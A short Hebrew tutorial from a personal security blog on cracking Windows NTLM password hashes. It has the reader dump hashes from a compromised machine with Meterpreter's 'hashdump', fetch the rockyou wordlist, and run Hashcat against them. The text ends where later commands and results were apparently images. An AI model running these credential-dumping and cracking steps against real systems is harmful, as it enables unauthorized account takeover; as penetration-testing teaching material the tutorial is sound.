כל הזכויות שמורות לטל בן שושן – Shushan.co.il

פיצוח Hash ע"י Hashcat

על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit

Hashcat מאפשר לנו לקחת קובץ סיסמאות, כמו rockyou ולהריץ אותו אל מול Hashes ובכך לנסות להתאים סיסמא ל Hash.

דרוש:

• Kali
• Windows 7/8/10
• גישת Meterpreter אל התחנה

תחילה נוריד את קובץ הסיסמאות rockyou, נפתח את הטרמינל בקאלי

sudo wget http://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt

לאחר שהורדנו את הקובץ, נחזור ל Meterpreter ונקיש את הפקודה

meterpreter > hashdump

לאחר מכן נפתח טרמינל חדש ונקיש

root@kali:~# sudo leafpad

ונעתיק את מה שקיבלנו מ hashdump ל leafpad בדיוק כך

ונשמור אותו בנתיב

/root/

בשם

password.txt

כעת באותו טרמינל אחרי ששמרנו נקיש את הפקודה

root@kali:~# hashcat -m 1000 /root/password.txt -o clearpassword.txt /root/rockyou.txt --force

*אם זה לא עובד, ה Syntx קצת שונה, קחו את השורה האחרונה בכל שורה, כמו בתמונה

והעבירו אותם למסמך טקסט אחר

הפעילו את הפקודה הבאה:

התוצאה